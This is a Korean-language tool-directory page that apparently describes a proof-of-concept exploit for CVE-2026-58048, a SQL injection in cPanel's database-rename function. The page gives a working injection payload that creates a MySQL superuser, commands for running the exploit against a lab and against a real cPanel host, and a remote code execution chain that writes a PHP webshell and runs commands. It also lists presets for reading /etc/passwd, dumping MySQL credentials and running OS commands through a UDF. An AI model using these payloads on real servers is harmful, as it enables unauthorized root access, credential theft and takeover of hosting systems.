Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
POC-CVE-2026-58048 — 보안 연구 프로젝트 | Kitploit
도구/GitHubGitHub/imbas007/poc-cve-2026-58048
Privilege EscalationExploitationWeb Application ExploitationWeb SecurityPenetration TestingDatabase SecurityLabs & Practice
GitHubimbas007/poc-cve-2026-58048

POC-CVE-2026-58048

보안 연구 프로젝트

저장소 보기
161개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-58048

CVSS 4.0: 9.4 (치명적) | CWE-89: SQL 인젝션 | NVD

인증된 cPanel 사용자 → 데이터베이스 이름 변경을 통한 MySQL root 권한의 임의의 SQL 실행. cPanel은 이름 변경 작업을 root로 실행할 때 사용자 세션의 sql_mode(ANSI_QUOTES)를 부적절하게 유지합니다 — 데이터베이스 이름의 백틱이 식별자에서 벗어나 SQL을 주입합니다.

root@kitploit:~
name: db`; GRANT ALL ON *.* TO 'rce'@'%' IDENTIFIED BY 'pwned!'; -- 

빠른 시작 (Docker 랩)

root@kitploit:~
pip install -r requirements.txt

python3 simulate.py start   # start lab (MariaDB:13306, cPanel API:18080, Apache:18081)
python3 poc.py -t http://localhost:18080 --mysql-port 13306 --payload admin-user --verify
python3 simulate.py stop

랩 모드는 자동 감지됩니다 — --lab 플래그가 필요하지 않습니다.

실제 cPanel 대상

root@kitploit:~
python3 poc.py -t https://cpanel.example.com:2083 -u user -p 'pass' \
    --payload admin-user --verify

페이로드 프리셋

사용자 지정 SQL: --inject "GRANT ALL ON *.* TO 'x'@'%' IDENTIFIED BY 'y'"

전체 RCE 체인 (랩)

root@kitploit:~
# 1. Write shell to web root
python3 poc.py -t http://localhost:18080 --mysql-port 13306 \
    --payload webshell --shell /var/www/html/shell.php

# 2. Execute commands via HTTP!
curl "http://localhost:18081/shell.php?0=id"

영향을 받는 버전

cPanel < 11.110.0.137, 11.118.0.71, 11.126.0.78, 11.134.0.48, 11.136.0.32; WP Squared < 11.138.1.6

완화 조치: 업그레이드하거나 cPanel 사용자의 MySQL 기능을 해지합니다.

참고 자료

  • cPanel 보안 권고
  • SecurityOnline

공인된 보안 테스트 및 교육 목적으로만 사용하십시오.

도구 다운로드
프리셋효과
admin-user (기본값)MySQL 관리자 사용자 rce 생성
compact-admin짧은 관리자 페이로드(<64자 — 실제 cPanel의 이름 제한에 맞음; 확인: r/p)
webshellINTO OUTFILE을 통한 PHP 셸 작성(--shell /var/www/html/shell.php)
read-fileLOAD_FILE을 통한 서버 파일 읽기(--file /etc/passwd)
dump-users모든 MySQL 자격 증명을 pwn.users로 덤프
udf-rceUDF를 통한 OS 명령 실행